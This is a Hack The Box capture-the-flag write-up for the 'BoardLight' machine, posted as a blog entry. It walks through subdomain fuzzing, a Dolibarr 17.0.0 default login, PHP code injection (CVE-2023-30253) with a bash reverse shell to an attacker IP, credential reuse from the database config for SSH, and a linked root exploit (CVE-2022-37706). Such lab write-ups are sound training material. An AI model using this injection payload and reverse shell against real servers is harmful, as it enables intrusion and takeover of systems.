mmckinnon/chirpy-starter
1
0
Fork 0
mirror of https://github.com/cotes2020/chirpy-starter.git synced 2025-04-21 03:43:28 +10:00
Code Issues Actions Packages Projects Releases Wiki Activity
chirpy-starter/_posts/2024-01-11-boardlight.md
racc0x 6278b1b310 update-2025
2025-02-03 22:22:27 -06:00

3.6 KiB
Raw Blame History

title date categories tags image
HTB - BoardLight 2024-02-02 12:17:34 -0400
hackthebox
BoardLight
HackTheBox
Dolibarr
PHP
CVE-2023-30253
LinPEAS
CVE-2022-37706
path lqip alt
/assets/img/post/boardlight/BoardLight-card.png data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA Hack the Box - BoardLight.

Box Info

Name BoardLight
Release Date 25 May, 2024
OS Linux
Rated Difficulty Easy

Enumeration

Image

SubDomain

wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt "Host: FUZZ.board.htb" -u [](http://board.htb/)[http://board.htb](http://board.htb)

Image

Image

Image

Image

The login page is using the default credentials by Dolibarr

Dolibarr 17.0.0

CVE-2023-30253

Missing Error Handling | OWASP Foundation

The version Dolibarr 17.0.0 has a vulnerability to PHP Code injection (RCE) (CVE-2023-30253)

Dolibarr confirm RCE in the version 17.0.0

Security Advisory: Dolibarr 17.0.0 PHP Code Injection (CVE-2023-30253) - Swascan

Image

We make a page and use PHP for try to get a reverse shell.

Image

Image

<?PHP echp system("whoami");?>

Image

<section id="mysection1" contenteditable="true">
<?PHP echo system("bash -c 'bash -i >& /dev/tcp/10.10.14.88/7777 0>&1'");?>
</section>

https://wiki.dolibarr.org/index.php?title=Backups

Credentials

$dolibarr_main_db_name='dolibarr'; $dolibarr_main_db_prefix='llx_'; $dolibarr_main_db_user='dolibarrowner'; $dolibarr_main_db_pass='serverfun2$2023!!'; $dolibarr_main_db_type='mysqli';

dolibarrowner

serverfun2$2023!!

cat /etc/passwd | grep bash

SSH:

larissa

serverfun2$2023!!

Image

I found no exploitable points and uploaded linpeas to scan for vulnerabilities.

LinPEAS

_LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix_/MacOS hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)_

PEASS-ng/linPEAS at master · peass-ng/PEASS-ng

Enlightenment_sys

Enlightenment_sys in some cases could be an internal component or refer to scripts or tools for interacting with Enlightenment; it could also be a module or a configuration depending on the context.

Image

In this point it's just exploit the CVE for scalation previleges and get the root flag.

GitHub - MaherAzzouzi/CVE-2022-37706-LPE-exploit: A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)

Run exploit.sh and you obtained the shell as root.